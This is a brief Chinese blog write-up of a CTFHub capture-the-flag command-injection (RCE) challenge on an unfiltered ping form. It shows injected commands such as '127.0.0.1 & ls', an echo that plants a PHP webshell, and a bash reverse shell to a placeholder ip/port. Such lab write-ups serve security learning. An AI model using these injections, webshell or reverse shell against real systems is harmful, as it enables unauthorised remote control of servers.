CTFHub web技能树 RCE
2021-04-11 12:28
阅读:441
标签:eval ima port 源码 post shell alt mic pre 一个简单的ping,还没有过滤,源码也给出来了 ls一下 有一个可疑的php文件,,,但是直接访问和 cat 都出不来。。。 试了几下反弹shell,没成功。。。于是直接用echo了一个一句话进去 注意这里$转义了一下,不转的话会被识别成变量。。 之后拿我40米长的菜刀 php用了注释。。和想的差不多 这题竟然花了那么久 我是这样反弹shell。。 CTFHub web技能树 RCE 标签:eval ima port 源码 post shell alt mic pre 原文地址:https://www.cnblogs.com/p201821440039/p/12411264.html
127.0.0.1 & ls
127.0.0.1 & echo "" > 3.php
bash -i >& /dev/tcp/ip/port 0>&1
上一篇:10-js的document对象
下一篇:调用百度翻译API接口功能
评论
亲,登录后才可以留言!